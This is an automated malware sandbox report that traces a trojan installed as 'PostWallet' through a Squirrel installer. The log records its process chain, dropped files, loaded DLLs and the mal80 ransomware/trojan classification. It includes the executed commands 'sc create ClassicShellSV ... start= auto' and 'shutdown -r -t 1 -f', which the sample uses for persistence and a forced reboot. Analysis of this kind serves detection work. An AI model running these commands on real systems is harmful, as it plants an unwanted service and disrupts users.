          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vmwarebase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\shutdown.exeSection loaded: shutdownext.dllJump to behavior
          Source: C:\Windows\System32\shutdown.exeSection loaded: sspicli.dllJump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Full Glass.skin.12.drStatic PE information: Section .rsrc
          Source: Smoked Glass.skin.12.drStatic PE information: Section .rsrc
          Source: Windows Aero.skin7.12.drStatic PE information: Section .rsrc
          Source: Classic Skin.skin.12.drStatic PE information: Section .rsrc
          Source: Windows Basic.skin.12.drStatic PE information: Section .rsrc
          Source: Metro.skin.12.drStatic PE information: Section .rsrc
          Source: Windows 8.skin7.12.drStatic PE information: Section .rsrc
          Source: Windows 8.skin.12.drStatic PE information: Section .rsrc
          Source: Classic Skin.skin7.12.drStatic PE information: Section .rsrc
          Source: Metro.skin7.12.drStatic PE information: Section .rsrc
          Source: Windows Aero.skin.12.drStatic PE information: Section .rsrc
          Source: Midnight.skin7.12.drStatic PE information: Section .rsrc
          Source: Windows XP Luna.skin.12.drStatic PE information: Section .rsrc
          Source: Metallic.skin7.12.drStatic PE information: Section .rsrc
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: y.vBP
          Source: classification engineClassification label: mal80.rans.troj.evad.winEXE@25/60@1/1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00345C70 Warning,Warning,GetLastError,Warning,Warning,Warning,GetLastError,Warning,Warning,StartServiceW,GetLastError,Warning,GetTickCount,QueryServiceStatus,GetTickCount,GetTickCount,Sleep,QueryServiceStatus,GetLastError,Warning,Warning,Warning,3_2_00345C70
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00345EE0 Warning,Warning,strrchr,memset,GetModuleFileNameW,GetLastError,WSCSetApplicationCategory,WSCSetApplicationCategory,Warning,Warning,WSAStartup,WSAGetLastError,Warning,StartServiceCtrlDispatcherW,GetLastError,3_2_00345EE0
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic ShellJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWalletJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3912:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\.squirrel-lock-DFC38E711ED80E7DCCA65DBC52A2C91F7124F492Jump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: 00023948209303294#U00ac320302282349843984903.exeVirustotal: Detection: 8%
          Source: 00023948209303294#U00ac320302282349843984903.exeString found in binary or memory: DeploymentTool.exe\need dictionaryinvalid literal/length codeinvalid distance codeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid bit length repeatoversubscribed dynamic bit lengths treeincomplete dynamic bit lengths treeoversubscribed literal/length treeincomplete literal/length treeoversubscribed distance treeincomplete distance treeempty distance tree with lengthsunknown compression methodinvalid window sizeincorrect header checkincorrect data check\..\\..//..//..\UT%s%s%s%s%sOpen Setup LogCloseInstallation has failedSquirrelSQUIRREL_TEMP%s%s\%sUnable to write to %s - IT policies may be restricting access to this folder\SquirrelTemp%s\SquirrelSetup.logDATAUpdate.exe"%s" --install . %sThere was an error while installing the application. Check the setup log for more information and contact the author.Failed to extract installervector<T> too longi
          Source: Update.exeString found in binary or memory: b=|baseUrl={Provides a base URL to prefix the RELEASES file packages with-a=|process-start-args=iArguments that will be used when starting executable-l=|shortcut-locations=
          Source: Update.exeString found in binary or memory: ((?=^[ ]{{0,{0}}}[^ \t\n])|\Z) # Lookahead for non-space at line-start, or end of doc
          Source: Update.exeString found in binary or memory: onError%Downloading file: 1Failed downloading URL: #Downloading url: 1Failed to download url: !squirrel-install3Starting automatic update7Failed to check for updates5Failed to download updates/Failed to apply updates9Failed to set up uninstaller){0} {1}{2} {3} # {4}
          Source: Update.exeString found in binary or memory: Scanning {0}mIgnoring {0} as the target framework is not compatible%Writing {0} to {1}UCouldn't find file for package in {1}: {0}%--squirrel-install%--squirrel-updated'--squirrel-obsolete)--squirrel-uninstall'--squirrel-firstrunAFailed to handle Squirrel events[\StringFileInfo\040904B0\SquirrelAwareVersion)SquirrelAwareVersion;Failed to promote Tray icon:
          Source: Update.exeString found in binary or memory: ..\Update.exegUpdate.exe not found, not a Squirrel-installed app?
          Source: Update.exeString found in binary or memory: update.MNo release to install, running the appIFailed to install package to app dirIFailed to update local releases file;Failed to invoke post-install;Starting fixPinnedExecutables)Fixing up tray icons
          Source: Update.exeString found in binary or memory: -delta.nupkg$iCannot apply combinations of delta and full packagesQCouldn't run Squirrel hook, continuing: ---squirrel-updated {0}---squirrel-install {0}9Squirrel Enabled Apps: [{0}]wNo apps are marked as Squirrel-aware! Going to run them all-Failed to delete key: /--squirrel-obsolete {0}7Couldn't delete directory: QCoudln't run Squirrel hook, continuing: WcleanDeadVersions: checking for version {0}kcleanDeadVersions: exclude current version folder {0}ccleanDeadVersions: exclude new version folder {0}
          Source: unknownProcess created: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
          Source: unknownProcess created: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe "C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe"
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Windows\System32\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUACJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrunJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMainJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMainJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMainJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= autoJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= autoJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: VMware Workstation.lnk.2.drLNK file: ..\..\..\..\..\..\Local\PostWallet\FilePosta.exe
          Source: VMware Workstation.lnk0.2.drLNK file: ..\AppData\Local\PostWallet\FilePosta.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic ShellJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\cacheJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zip1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\PolicyDefinitions.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\HISTORY.txtJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuHelperL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ExplorerL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\SkinsJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\IE Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Menu Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Screen.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShell.chmJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\pack01.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PostWalletJump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic file information: File size 6569472 > 1048576
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x619000
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, FilePost?a.exe, 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, FilePost?a.exe, 00000007.00000002.4090125560.000000006E391000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup64\ClassicExplorer64.pdb source: ClassicExplorer64.dll.12.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicStartMenu\Setup64\ClassicStartMenu.pdb source: ClassicStartMenu.exe.12.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdbO source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb source: ClassicIE_64.exe0.12.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb source: ClassicExplorerSettings.exe.12.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb-- source: Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000000.1656237951.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000000.1668661110.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000002.4088940375.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdb source: ClassicExplorer32.dll.12.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb`BXt< source: ClassicExplorerSettings.exe.12.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 00023948209303294#U00ac320302282349843984903.exe
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdb source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb! source: ClassicIE_64.exe0.12.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb source: Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000000.1656237951.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000000.1668661110.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000002.4088940375.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdbL@ source: ClassicExplorer32.dll.12.dr
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: ClassicIE_64.exe.12.drStatic PE information: 0xF72C17BC [Mon May 30 02:06:52 2101 UTC]
          Source: Main.dll.7.drStatic PE information: section name: .didata
          Source: ClassicIE_64.dll.12.drStatic PE information: section name: .didata
          Source: ClassicIEDLL_64.dll.12.drStatic PE information: section name: _RDATA
          Source: ClassicIE_64.exe.12.drStatic PE information: section name: .didat
          Source: ClassicStartMenuDLL.dll.12.drStatic PE information: section name: text
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 2_2_00007FFD9B78D2A5 pushad ; iretd 2_2_00007FFD9B78D2A6
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D168200 push ecx; ret 3_2_6D168213
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6E39F601 push ecx; ret 3_2_6E39F614
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6E39F800 push eax; ret 3_2_6E39F81E
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to dropped file
